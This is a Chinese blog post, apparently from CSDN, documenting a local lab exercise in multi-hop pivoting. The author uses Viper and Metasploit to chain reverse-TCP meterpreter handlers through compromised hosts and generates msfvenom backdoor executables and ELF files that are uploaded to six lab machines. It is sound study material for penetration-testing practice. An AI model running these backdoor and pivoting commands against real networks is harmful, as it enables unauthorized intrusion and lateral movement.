Viper+MSF:靶机代理转发上线学习

已于 2024-03-08 13:02:15 修改
阅读量1.3k 收藏 4
点赞数 2
分类专栏: 渗透学习 文章标签: 服务器 网络安全 网络
于 2023-02-12 22:19:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laobanjiull/article/details/129000468
版权

关注WX:【小白SEC】查看更多内容……

本文仅为代理转发学习,在本地环境测试验证,无其它目的,请勿用于未经授权的测试

说明:

之前学习的代理转发上线,近期也做实验通过Viper,利用MSF实现了多重代理转发上线靶机,过程有些繁琐,但自我感觉对于学习代理转发还是挺有用的,同时推荐一下这个Viper工具,图形化的界面不仅炫酷而且实用:Viper:https://www.yuque.com/vipersec/

环境说明:

Win7_1
IP1:172.10.10.3
IP2:10.10.10.3
WinServer
IP1:10.10.10.5
IP2:172.26.26.5
Win7_2
IP1:172.26.26.6
IP2:192.168.1.6
Ubuntu1
IP1:172.10.10.8
IP2:10.10.10.8
Ubuntu2
IP1:10.10.10.10
IP2:172.26.26.10
Ubuntu3
IP1:172.26.26.7
IP2:192.168.1.7
拓扑图
在这里插入图片描述

实验过程:

  1. 打开Viper,新建监听
    在这里插入图片描述

  2. 生成exe,并上传至Win7_1中执行
    在这里插入图片描述
    在这里插入图片描述

  3. 返回Viper查看,Win7_1已上线:
    在这里插入图片描述

  4. 查看当前靶机IP信息:
    方法一:
    在这里插入图片描述
    在这里插入图片描述
    方法二:
    进入【MSFCONSOLE】——进入Session——输入【ifconfig】
    在这里插入图片描述

  5. 选择Win7_1的Sessions进行内网探测:
    方法一:
    在这里插入图片描述
    执行后可在拓扑图中查看结果:
    在这里插入图片描述
    方法二:
    进入【MSFCONSOLE】——进入Session——输入:run post/windows/gather/arp_scanner RHOSTS=探测网段/IP
    在这里插入图片描述

  6. 查看到内网另一网段存在的IP,开始进行上线内网的WinServer,在此也可以执行路由添加直接使用msf探测或者挂Socks代理,此处仅作添加路由展示:
    方法一:
    在这里插入图片描述
    在这里插入图片描述
    方法二:
    进入【MSFCONSOLE】——进入Session——输入:run post/multi/manage/autoroute
    在这里插入图片描述

  7. 上线WinServer前,需要进行代理转发上线,利用Win7_1的session进行代理转发上线,输入以下命令,生成监听:

msf6 auxiliary(server/socks_proxy) > use exploit/multi/handler 					//使用攻击模块
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp			//设置Payload
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST x.x.x.x			//设置IP为边界机的内网IP,即Win7的内网IPx.x.x.x
LHOST => x.x.x.x
msf6 exploit(multi/handler) > set LPORT 1234			//设置边界机的端口
LPORT => 1234
msf6 exploit(multi/handler) > set ReverseListenerComm 1			//将此设置应用在Win7的session上
ReverseListenerComm => 1
msf6 exploit(multi/handler) > run			//运行
[*] Started reverse TCP handler on x.x.x.x:1234 via the meterpreter on session 1

在这里插入图片描述

  1. 生成监听后,再使用msfvenom生成后门程序,此处使用其他的msfvenom生成后门exe,命令如下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1234 -f exe > WinServer.exe
//参数对照【步骤7】中的参数

在这里插入图片描述

  1. 将生成的后门程序上传至WinServer,并执行:
    在这里插入图片描述

  2. 返回Viper查看,WinServer已上线:
    在这里插入图片描述

  3. 再次使用【步骤4】、【步骤5】、【步骤6】的方法进行内网IP探测和添加路由,过程不详述:
    在这里插入图片描述

  4. 准备上线Win7_2,上线Win7_2需要使用WinServer进行代理转发,方法类似【步骤7】:

msf6 > use exploit/multi/handler 					//使用攻击模块
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp			//设置Payload
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST x.x.x.x			//设置IP为边界机的内网IP,即WinServer的内网IPx.x.x.x
LHOST => x.x.x.x
msf6 exploit(multi/handler) > set LPORT 1234			//设置边界机的端口
LPORT => 1234
msf6 exploit(multi/handler) > set ReverseListenerComm 2			//将此设置应用在WinServer的session上
ReverseListenerComm => 2
msf6 exploit(multi/handler) > run			//运行
[*] Started reverse TCP handler on x.x.x.x:1234 via the meterpreter on session 2

在这里插入图片描述

  1. 按照【步骤8】生成Win7_2的后门程序,并上传至Win7_2执行:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1234 -f exe > Win7_2.exe
//参数对照【步骤7】中的参数

在这里插入图片描述
在这里插入图片描述

  1. 返回Viper查看Win7_2已上线:
    在这里插入图片描述

  2. 再次使用【步骤4】、【步骤5】、【步骤6】的方法进行内网IP探测和添加路由,过程不详述:
    在这里插入图片描述

  3. 当前拓扑如下:
    在这里插入图片描述

  4. 开始上线Ubuntu1,Ubuntu1可以直接使用Viper上线,新建监听:
    在这里插入图片描述

  5. 使用msfvenom生成属于Ubuntu1的后门,方法参照【步骤8】命令如下,并上传至Ubuntu1添加执行权限并执行:
    msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=7002 -f elf > Ubuntu1.elf在这里插入图片描述

  6. 返回Viper查看Ubuntu1已上线:

  7. 开始上线Ubuntu2,Ubuntu2上线需要使用Ubuntu1或者Win7_1的session作为代理转发上线,此处分别使用Ubuntu1作为代理转发上线和Win7_1作为代理转发上线,方法类似【步骤7】:
    方法一:使用Ubuntu1作为代理转发上线
    此步骤忘整理了,参考【步骤21】
    方法二:使用Win7_1作为代理转发上线

msf6 > use exploit/multi/handler 					//使用攻击模块
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp			//设置Payload
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST x.x.x.x			//设置IP为边界机的内网IP,即Win7_1的内网IPx.x.x.x
LHOST => x.x.x.x
msf6 exploit(multi/handler) > set LPORT 1234			//设置边界机的端口
LPORT => 1234
msf6 exploit(multi/handler) > set ReverseListenerComm 1			//将此设置应用在Win7_1的session上
ReverseListenerComm => 1
msf6 exploit(multi/handler) > run			//运行
[*] Started reverse TCP handler on x.x.x.x:1234 via the meterpreter on session 1

使用msfvenom生成Ubuntu2的后门,上传至Ubuntu2,添加执行权限并执行:

`msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=1234 -f elf > Ubuntu2_Ubuntu1.elf`![在这里插入图片描述](https://img-blog.csdnimg.cn/e0312d9dce194151995c5f507c4c8632.png)

返回查看viper已上线:
在这里插入图片描述

  1. 开始上线Ubuntu3,Ubuntu3上线需要使用Ubuntu2或者WinServer的session作为代理转发上线,此处分别使用Ubuntu2作为代理转发上线和WinServer作为代理转发上线,方法类似【步骤7】:
    方法一:使用Ubuntu2作为代理转发上线
msf6 > use exploit/multi/handler 					//使用攻击模块
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp			//设置Payload
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST x.x.x.x			//设置IP为边界机的内网IP,即Ubuntu2的内网IPx.x.x.x
LHOST => x.x.x.x
msf6 exploit(multi/handler) > set LPORT 1234			//设置边界机的端口
LPORT => 1234
msf6 exploit(multi/handler) > set ReverseListenerComm 1			//将此设置应用在Ubuntu2的session上
ReverseListenerComm => 1
msf6 exploit(multi/handler) > run			//运行
[*] Started reverse TCP handler on x.x.x.x:1234 via the meterpreter on session 1

在这里插入图片描述
使用msfvenom生成Ubuntu3的后门,上传至Ubuntu3,添加执行权限并执行:

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=1234 -f elf > Ubuntu3_Ubuntu2.elf

在这里插入图片描述
返回查看viper已上线:
在这里插入图片描述
方法二:使用WinServer作为代理转发上线

msf6 > use exploit/multi/handler 					//使用攻击模块
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp			//设置Payload
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST x.x.x.x			//设置IP为边界机的内网IP,即WinServer的内网IPx.x.x.x
LHOST => x.x.x.x
msf6 exploit(multi/handler) > set LPORT 1234			//设置边界机的端口
LPORT => 1234
msf6 exploit(multi/handler) > set ReverseListenerComm 2			//将此设置应用在WinServer的session上
ReverseListenerComm => 2
msf6 exploit(multi/handler) > run			//运行
[*] Started reverse TCP handler on x.x.x.x:1234 via the meterpreter on session 2

在这里插入图片描述
使用msfvenom生成Ubuntu3的后门,上传至Ubuntu3,添加执行权限并执行:

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=1234 -f elf > Ubuntu3_WinServer.elf

在这里插入图片描述
返回查看viper已上线:
在这里插入图片描述

本文完结:

至此,一共6台主机已全部上线,此文章仅作代理上线学习,真实过程肯定不止如此简单,还需要多学习学习。

Acczdy
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
MSF配置代理转发
j13373960206的博客
07-13 717
现在可以将主机1 设置成代理转发模式,也就是ms将数据包发送给主机1 ,主机1 再将数据包发送给主机2 ,以此来完成控制主机2。1、getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管 道。2、getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。此时在msf和主机2之间有主机1 ,而且主机1 已经被我们所控制(成功上线)2、修改配置文件,指定使用kail中的配置的代理服务。在被入侵的主机上,执行后门后,此时会发现上线成功。
go web项目框架(viper+gin+gorm)适合初学者使用
01-26
Go Web项目框架,如标题所提及的“viper+gin+gorm”,是为初学者提供的一种高效、简洁的开发解决方案。这个框架组合充分利用了Go语言的强项,使其成为构建高性能Web应用的理想选择。让我们逐一深入理解这三个核心...
MSF图形化界面Viper(炫彩蛇)下载与使用
热门推荐
weixin_42489549的博客
06-03 1万+
Viper(炫彩蛇)是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化. Viper(炫彩蛇)集成杀软绕过,内网隧道,文件管理,命令行等基础功能. Viper(炫彩蛇)当前已集成70+个模块,覆盖初始访问/持久化/权限提升/防御绕过/凭证访问/信息收集/横向移动等大类. Viper(炫彩蛇)目标是帮助红队工程师提高攻击效率,简化操作,降低技术门槛. Viper(炫彩蛇)支持在浏览器中运行原生msfconsole,且支持多人协作. 安装 docker curl -sSL https:
viper:一款中国人写的红队服务器——记一次内网穿透练习
xnxqwzy的博客
08-25 988
利用 struts2 攻击边界web服务器写入冰蝎木马viper - 监听载荷 - 生成载荷选择反弹的Java载荷设定lport:6666载荷类型:war重命名war为 ma.war冰蝎把ma.war上传到tomcat\webapp\目录下刷新冰蝎的目录如果生成了ma这个目录访问:http://ip:8080/ma 地址,会发现viper这面木马上线viper上线的主机上右键点选内网路由添加路由,建议使用自动生成路由内网代理 - 新增代理 - 设定代理端口。
国产图形化的msf——Viper初体验
网安君的博客
08-24 2394
简单来说就是图形化的MSF,可以让用户在内网渗透中更加方便快捷使用,功能如下。
Viper炫彩蛇的使用(MSF图形化界面)
精品博客,你值得一看~
09-20 545
Viper炫彩蛇的下载与安装(MSF图形化界面)_简易极速安装版_徐长卿学网安的博客-CSDN博客。
VIPER-Templates:用于创建 VIPER 架构堆栈的 Swift Xcode 模板
05-31
Xcode VIPER 模板 可以帮助您入门。 VIPER 是一个 6 层架构,将模块任务抽象到每一层,这样一切都有一个单一的责任。 它符合 SOLID 设计原则,是 Clean Architecture 概念的实现。 这些模板是用 Swift 编写的,...
FxRate:使用VIPER + Dagger2 + RxJava2 + Mockito和Espresso + Retrofit&Moshi的外汇汇率应用程序
04-18
VIPER + Dagger2 + RxJava2 + Mockito和Espresso + Retrofit和Moshi : 依赖注入-Dagger2 根据VIPER体系结构,该项目分为不同的层,并且依赖项注入用于在层之间提供所需的组件。 Dagger2是此项目中使用的依赖项...
Viper-Browser:使用QtWebEngine的轻量级Qt5 Web浏览器
02-05
自定义用户代理支持 快速轻巧 全屏支持 对浏览器设置和Web权限的粒度控制 使用户可以控制自己的数据,不会像其他浏览器那样侵犯隐私。 GreaseMonkey样式的UserScript支持 主页的多个选项-任何URL,空白页或
VIPER-Practice:VIPER-Practice
02-18
VIPER实践是iOS应用开发中的一种架构模式,全称为View-Interactor-Presenter-Entity-Router。这个架构模式旨在提高代码的可维护性、可测试性和模块化程度,尤其适用于大型项目。VIPER中的每个组件都有明确的职责,...
MSF测试工具说明
weixin_68681298的博客
07-29 1024
1 auxiliary:辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等)2 exploits:漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。3 payloads:攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码4 post:后渗透阶段模块,漏洞利用成功获得meterpreter之后, 向目标发送的一些功能性指令,如:提权等。
Viper渗透框架
HAKUNAMATATATTA的博客
01-10 4244
Viper (炫彩蛇)是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化。集成杀软绕过,内网隧道,文件管理,命令行等基础功能。当前已集成70+个模块,覆盖初始访问/持久化/权限提升/防御绕过/凭证访问/信息收集/横向移动等大类。目标是帮助红队工程师提高攻击效率,简化操作,降低技术门槛。支持在浏览器中运行原生 msfconsole ,且支持多人协作
MSF图形化工具Viper快速安装
最新发布
The current road is different, love needs to distinguish between right and wrong
11-12 574
Viper(炫彩蛇)是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化.Viper(炫彩蛇)集成杀软绕过,内网隧道,文件管理,命令行等基础功能.Viper(炫彩蛇)当前已集成70+个模块,覆盖初始访问/持久化/权限提升/防御绕过/凭证访问/信息收集/横向移动等大类.Viper(炫彩蛇)目标是帮助红队工程师提高攻击效率,简化操作,降低技术门槛.Viper(炫彩蛇)支持在浏览器中运行原生msfconsole,且支持多人协作.没有人规定,一朵花一定要成长为向日葵或者玫瑰。
内网viper的简单使用
千寻的博客
11-10 1191
Viper(炫彩蛇)是提供图形化的操作界面,用户使用浏览器即可进行内网渗透.使用过程记录
内网安全-代理Socks协议&CS-MSF控制上线
m0_65336233的博客
12-19 1862
内网安全-代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线
MSF开启socks代理内网渗透
The current road is different, love needs to distinguish between right and wrong
04-25 5957
简介 当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网。 MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理,socks5可以设置用户名和密码;现在新版本的kali已经整合了socks代理。 测试环境 kali: 192.168.95.128 windows7: 192.168.95.169 ; 192.168.70.3 server2012: 192.168.70.2
msf 代理转发
03-11 5390
简介 本篇文章主要是关于msf框架的实战内容,主要是关于代理,中继的内容的 网络拓扑图如下 根据网络拓扑,目标公司公网上暴露着一台服务器,然后内部还有两台服务器,但是不能出网,也无法直接访问到,防火墙对于进站规则限制严格,仅允许访问80,443端口,对于A服务器的出站不做限制。 以下的实验是基于这种前提:我们已经拿下了服务器的权限,并且成功反弹shell的情况下,将实验msf在以下三种跨网段的使用 添加路由 端口转发 反向代理 添加路由 ,适用于初始的跨网段代理 端口转发,适用于访问特定目标的代理
内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)
不知名白帽的博客
09-18 1万+
内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值